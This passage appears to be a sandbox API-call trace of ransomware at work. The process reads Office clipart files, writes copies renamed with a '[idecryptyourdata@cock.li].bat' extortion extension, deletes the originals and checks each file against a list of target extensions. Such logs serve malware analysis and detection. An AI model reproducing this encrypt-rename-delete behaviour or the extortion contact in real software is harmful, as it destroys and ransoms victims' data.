lpNumberOfBytesWritten=0x2d0fc94*=0x5520, lpOverlapped=0x0) returned 1 [0069.078] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.078] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.078] SetEndOfFile (hFile=0x380) returned 1 [0069.078] CloseHandle (hObject=0x380) returned 1 [0069.078] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.078] SetEndOfFile (hFile=0x340) returned 1 [0069.079] CloseHandle (hObject=0x340) returned 1 [0069.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf")) returned 1 [0069.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 68 [0069.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 68 [0069.081] lstrlenW (lpString=".doc") returned 4 [0069.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.081] lstrlenW (lpString=".docx") returned 5 [0069.081] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0069.081] lstrlenW (lpString=".pdf") returned 4 [0069.081] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.082] lstrlenW (lpString=".xls") returned 4 [0069.082] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.082] lstrlenW (lpString=".xlsx") returned 5 [0069.082] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0069.082] lstrlenW (lpString=".ppt") returned 4 [0069.082] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 68 [0069.082] lstrlenW (lpString=".zip") returned 4 [0069.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.082] lstrlenW (lpString=".rar") returned 4 [0069.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.082] lstrlenW (lpString=".bz2") returned 4 [0069.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.082] lstrlenW (lpString=".7z") returned 3 [0069.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 68 [0069.082] lstrlenW (lpString=".dbf") returned 4 [0069.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 68 [0069.082] lstrlenW (lpString=".1cd") returned 4 [0069.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 68 [0069.082] lstrlenW (lpString=".jpg") returned 4 [0069.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.083] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.083] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.086] GetLastError () returned 0x0 [0069.086] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x375e, lpOverlapped=0x0) returned 1 [0069.094] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3760, lpOverlapped=0x0) returned 1 [0069.095] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.095] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.096] SetEndOfFile (hFile=0x38c) returned 1 [0069.096] CloseHandle (hObject=0x38c) returned 1 [0069.096] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.096] SetEndOfFile (hFile=0x380) returned 1 [0069.097] CloseHandle (hObject=0x380) returned 1 [0069.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.097] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf")) returned 1 [0069.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 68 [0069.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 68 [0069.097] lstrlenW (lpString=".doc") returned 4 [0069.097] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.097] lstrlenW (lpString=".docx") returned 5 [0069.098] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0069.098] lstrlenW (lpString=".pdf") returned 4 [0069.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.098] lstrlenW (lpString=".xls") returned 4 [0069.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.098] lstrlenW (lpString=".xlsx") returned 5 [0069.098] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0069.098] lstrlenW (lpString=".ppt") returned 4 [0069.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 68 [0069.098] lstrlenW (lpString=".zip") returned 4 [0069.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.098] lstrlenW (lpString=".rar") returned 4 [0069.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.098] lstrlenW (lpString=".bz2") returned 4 [0069.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.098] lstrlenW (lpString=".7z") returned 3 [0069.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 68 [0069.098] lstrlenW (lpString=".dbf") returned 4 [0069.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 68 [0069.098] lstrlenW (lpString=".1cd") returned 4 [0069.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 68 [0069.098] lstrlenW (lpString=".jpg") returned 4 [0069.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.099] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.099] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.099] GetLastError () returned 0x0 [0069.099] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3d40, lpOverlapped=0x0) returned 1 [0069.128] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3d50, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3d50, lpOverlapped=0x0) returned 1 [0069.129] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.129] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.129] SetEndOfFile (hFile=0x38c) returned 1 [0069.129] CloseHandle (hObject=0x38c) returned 1 [0069.129] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.129] SetEndOfFile (hFile=0x380) returned 1 [0069.130] CloseHandle (hObject=0x380) returned 1 [0069.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf")) returned 1 [0069.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 68 [0069.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 68 [0069.134] lstrlenW (lpString=".doc") returned 4 [0069.134] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.134] lstrlenW (lpString=".docx") returned 5 [0069.134] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0069.134] lstrlenW (lpString=".pdf") returned 4 [0069.134] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.134] lstrlenW (lpString=".xls") returned 4 [0069.134] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.134] lstrlenW (lpString=".xlsx") returned 5 [0069.134] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0069.134] lstrlenW (lpString=".ppt") returned 4 [0069.134] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 68 [0069.134] lstrlenW (lpString=".zip") returned 4 [0069.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.134] lstrlenW (lpString=".rar") returned 4 [0069.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.134] lstrlenW (lpString=".bz2") returned 4 [0069.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.134] lstrlenW (lpString=".7z") returned 3 [0069.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 68 [0069.134] lstrlenW (lpString=".dbf") returned 4 [0069.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 68 [0069.134] lstrlenW (lpString=".1cd") returned 4 [0069.134] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 68 [0069.135] lstrlenW (lpString=".jpg") returned 4 [0069.135] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.137] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.137] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.159] GetLastError () returned 0x0 [0069.159] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3d90, lpOverlapped=0x0) returned 1 [0069.191] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3da0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3da0, lpOverlapped=0x0) returned 1 [0069.192] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.192] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.192] SetEndOfFile (hFile=0x368) returned 1 [0069.192] CloseHandle (hObject=0x368) returned 1 [0069.192] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.192] SetEndOfFile (hFile=0x380) returned 1 [0069.193] CloseHandle (hObject=0x380) returned 1 [0069.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.193] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf")) returned 1 [0069.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 68 [0069.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 68 [0069.194] lstrlenW (lpString=".doc") returned 4 [0069.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.194] lstrlenW (lpString=".docx") returned 5 [0069.194] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0069.194] lstrlenW (lpString=".pdf") returned 4 [0069.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.194] lstrlenW (lpString=".xls") returned 4 [0069.194] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.194] lstrlenW (lpString=".xlsx") returned 5 [0069.194] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0069.194] lstrlenW (lpString=".ppt") returned 4 [0069.194] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 68 [0069.194] lstrlenW (lpString=".zip") returned 4 [0069.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.194] lstrlenW (lpString=".rar") returned 4 [0069.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.194] lstrlenW (lpString=".bz2") returned 4 [0069.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.194] lstrlenW (lpString=".7z") returned 3 [0069.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 68 [0069.194] lstrlenW (lpString=".dbf") returned 4 [0069.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 68 [0069.194] lstrlenW (lpString=".1cd") returned 4 [0069.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF") returned 68 [0069.195] lstrlenW (lpString=".jpg") returned 4 [0069.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.195] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.195] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.195] GetLastError () returned 0x0 [0069.195] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x136a, lpOverlapped=0x0) returned 1 [0069.206] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1370, lpOverlapped=0x0) returned 1 [0069.207] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.207] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.207] SetEndOfFile (hFile=0x368) returned 1 [0069.209] CloseHandle (hObject=0x368) returned 1 [0069.209] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.209] SetEndOfFile (hFile=0x380) returned 1 [0069.212] CloseHandle (hObject=0x380) returned 1 [0069.212] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.212] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf")) returned 1 [0069.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 68 [0069.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 68 [0069.213] lstrlenW (lpString=".doc") returned 4 [0069.213] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.213] lstrlenW (lpString=".docx") returned 5 [0069.213] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0069.213] lstrlenW (lpString=".pdf") returned 4 [0069.213] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.213] lstrlenW (lpString=".xls") returned 4 [0069.213] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.213] lstrlenW (lpString=".xlsx") returned 5 [0069.213] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0069.213] lstrlenW (lpString=".ppt") returned 4 [0069.213] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 68 [0069.213] lstrlenW (lpString=".zip") returned 4 [0069.213] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.213] lstrlenW (lpString=".rar") returned 4 [0069.213] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.213] lstrlenW (lpString=".bz2") returned 4 [0069.213] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.213] lstrlenW (lpString=".7z") returned 3 [0069.213] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 68 [0069.213] lstrlenW (lpString=".dbf") returned 4 [0069.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 68 [0069.213] lstrlenW (lpString=".1cd") returned 4 [0069.213] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 68 [0069.213] lstrlenW (lpString=".jpg") returned 4 [0069.213] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.214] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.214] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.215] GetLastError () returned 0x0 [0069.215] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5f39, lpOverlapped=0x0) returned 1 [0069.223] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x5f40, lpOverlapped=0x0) returned 1 [0069.224] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.224] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.225] SetEndOfFile (hFile=0x38c) returned 1 [0069.225] CloseHandle (hObject=0x38c) returned 1 [0069.225] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.225] SetEndOfFile (hFile=0x380) returned 1 [0069.226] CloseHandle (hObject=0x380) returned 1 [0069.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.226] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg")) returned 1 [0069.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 68 [0069.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 68 [0069.226] lstrlenW (lpString=".doc") returned 4 [0069.226] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.226] lstrlenW (lpString=".docx") returned 5 [0069.226] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0069.227] lstrlenW (lpString=".pdf") returned 4 [0069.227] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.227] lstrlenW (lpString=".xls") returned 4 